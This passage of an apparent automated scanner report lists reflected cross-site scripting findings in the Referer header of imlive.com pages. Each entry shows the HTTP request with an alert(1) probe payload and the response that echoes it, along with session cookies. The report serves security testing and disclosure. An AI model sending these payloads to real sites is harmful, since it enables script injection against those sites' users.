Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:52 GMT
Connection: close
Content-Length: 43821
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/faq_m1.aspx&he=imlive.com&ul=/webcam-faq/&rf=http://www.google.com/search?hl=en^q=2fad7'-alert(1)-'8afcbd3f2d9&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.994. http://imlive.com/webcam-login/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-login/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e5a5'-alert(1)-'88572b36594 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-login/ HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=9e5a5'-alert(1)-'88572b36594
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:17:22 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 21496


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/login.aspx&he=imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=9e5a5'-alert(1)-'88572b36594&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.995. http://imlive.com/webcam-sign-up/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-sign-up/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f7f4'-alert(1)-'eebadb10194 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-sign-up/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=4f7f4'-alert(1)-'eebadb10194

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:50 GMT
Connection: close
Content-Length: 40633
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=4f7f4'-alert(1)-'eebadb10194&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.996. http://imlive.com/wmaster.ashx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /wmaster.ashx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9d2b'-alert(1)-'d37559930d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wmaster.ashx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=f9d2b'-alert(1)-'d37559930d9

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:46 GMT
Connection: close
Content-Length: 220620
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=f9d2b'-alert(1)-'d37559930d9&qs=cat=1^roomid=10&qs=cat=1^roomid=10&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

4.997. http://imlive.com/wmaster.ashx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /wmaster.ashx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a1e0b'><script>alert(1)</script>829092c5393 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp&waron=yes&promocode=YZSUSA5583 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=a1e0b'><script>alert(1)</script>829092c5393

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:05:44 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyLRxWQc0aKAUPIcMr1z98%2F8hVk8Zl52g6XTc8ahIm5wd95g1OvMx5PgQr72%2BwfrefAKt0za8Ox5k7OXzxCV4gt%2F; path=/
Set-Cookie: prmntimlv=; expires=Sat, 03-May-2008 14:05:44 GMT; path=/
Set-Cookie: ASPSESSIONIDSAAQACTT=FIFIDFMACFGGBNHOPCCDFLHL; path=/
X-Powered-By: vsrv10
Date: Fri, 28 Jan 2011 14:05:43 GMT
Set-Cookie: BIGipServerImlive=2115241538.20480.0000; path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10243


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp&lr=1107815990&ud=0&pe=homepagems3.asp&rf=http://www.google.com/search?hl=en^q=a1e0b'><script>alert(1)</script>829092c5393&sr=0&iy=dallas&id=44&iu=1' height='1' width='1'>
...[SNIP]...

4.998. http://in.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbbcb'-alert(1)-'3f0965cdc19 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cbbcb'-alert(1)-'3f0965cdc19

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=od52s455aeusmw2ttl2jno55; path=/; HttpOnly
Set-Cookie: pin=; expires=Thu, 27-Jan-2011 14:24:37 GMT; path=/
Set-Cookie: ASP.NET_SessionId=od52s455aeusmw2ttl2jno55; path=/; HttpOnly
Set-Cookie: pin=; expires=Thu, 27-Jan-2011 14:24:37 GMT; path=/
Set-Cookie: spvdr=vd=94644a2b-b5a6-48ed-b0a3-514954c94902&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:37 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:36 GMT
Connection: close
Content-Length: 20976
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=in.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=cbbcb'-alert(1)-'3f0965cdc19&iy=dallas&id=44&iu=1&vd=94644a2b-b5a6-48ed-b0a3-514954c94902';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.999. http://in.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59e4e'-alert(1)-'86c82395764 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/ HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=59e4e'-alert(1)-'86c82395764

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=5nkv5m55ppg2vpflz1okbf45; path=/; HttpOnly
Set-Cookie: pin=; expires=Thu, 27-Jan-2011 14:24:46 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5nkv5m55ppg2vpflz1okbf45; path=/; HttpOnly
Set-Cookie: pin=; expires=Thu, 27-Jan-2011 14:24:46 GMT; path=/
Set-Cookie: spvdr=vd=3ba947dc-7aad-4c6e-8765-3c7be452a15c&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:46 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:46 GMT
Connection: close
Content-Length: 260428
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=in.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=59e4e'-alert(1)-'86c82395764&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=3ba947dc-7aad-4c6e-8765-3c7be452a15c';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.1000. http://it.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a33e'-alert(1)-'3a6e8f04043 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5a33e'-alert(1)-'3a6e8f04043

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ovcnrd450rtssw55wufvjq45; path=/; HttpOnly
Set-Cookie: pit=; expires=Thu, 27-Jan-2011 14:24:52 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ovcnrd450rtssw55wufvjq45; path=/; HttpOnly
Set-Cookie: pit=; expires=Thu, 27-Jan-2011 14:24:52 GMT; path=/
Set-Cookie: spvdr=vd=d1360715-fb93-4254-aa31-8119266d4974&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:52 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:52 GMT
Connection: close
Content-Length: 18182
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=it.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=5a33e'-alert(1)-'3a6e8f04043&iy=dallas&id=44&iu=1&vd=d1360715-fb93-4254-aa31-8119266d4974';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1001. http://it.imlive.com/waccess/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.imlive.com
Path:   /waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60b0b'-alert(1)-'74ef2eb4a5d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=60b0b'-alert(1)-'74ef2eb4a5d

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=myqkgp452acf4lzi5u4hkwjd; path=/; HttpOnly
Set-Cookie: pit=; expires=Thu, 27-Jan-2011 14:25:07 GMT; path=/
Set-Cookie: ASP.NET_SessionId=myqkgp452acf4lzi5u4hkwjd; path=/; HttpOnly
Set-Cookie: pit=; expires=Thu, 27-Jan-2011 14:25:07 GMT; path=/
Set-Cookie: spvdr=vd=d2a2406f-0bd6-41db-8e90-2eb8d968ddf1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:07 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:07 GMT
Connection: close
Content-Length: 20718
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/login.aspx&he=it.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=60b0b'-alert(1)-'74ef2eb4a5d&iy=dallas&id=44&iu=1&vd=d2a2406f-0bd6-41db-8e90-2eb8d968ddf1';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.1002. http://jp.imlive.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://jp.imlive.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3539e'-alert(1)-'9d756dfe67 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

